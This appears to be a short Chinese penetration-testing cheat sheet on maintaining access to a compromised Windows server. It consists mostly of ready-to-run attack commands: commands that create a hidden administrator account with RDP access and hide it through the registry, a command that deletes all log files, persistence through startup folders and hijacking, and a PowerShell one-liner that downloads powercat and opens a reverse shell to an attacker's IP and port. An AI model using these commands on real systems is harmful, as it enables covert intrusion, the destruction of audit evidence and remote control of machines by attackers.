渗透测试之权限维持的方法
当我们获取到服务器权限后,留下后门,为未来去登陆该服务器做准备。
权限维持的方法
基本上现在常见的方法有以下几种:
1、隐藏、克隆账户
windows 隐藏账户
net localgroup “Domain Admin” test$ /add
net user test$ test /add
net localgroup Administrators test$ /add
net localgroup “Remote Desktop Users” test$ /add
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList” /v test$ /T REG_DWORD /D 0
net user test$ /del
del %WINDIR%\*.log /a/s/q/f 删除所有日志文件
2、shift后门
3、启动项、计划任务
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup
4、劫持技术
com劫持
映像劫持 : 改注册表,debugger
dll劫持,clr
5、Powershell后门
powershell IEX (New-Object
System.Net.Webclient).DownloadString(\’https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\’);powercat -c ip地址 -p 端口 -e cmd
详细步骤链接:https://www.cnblogs.com/xiaozi/p/7613288.html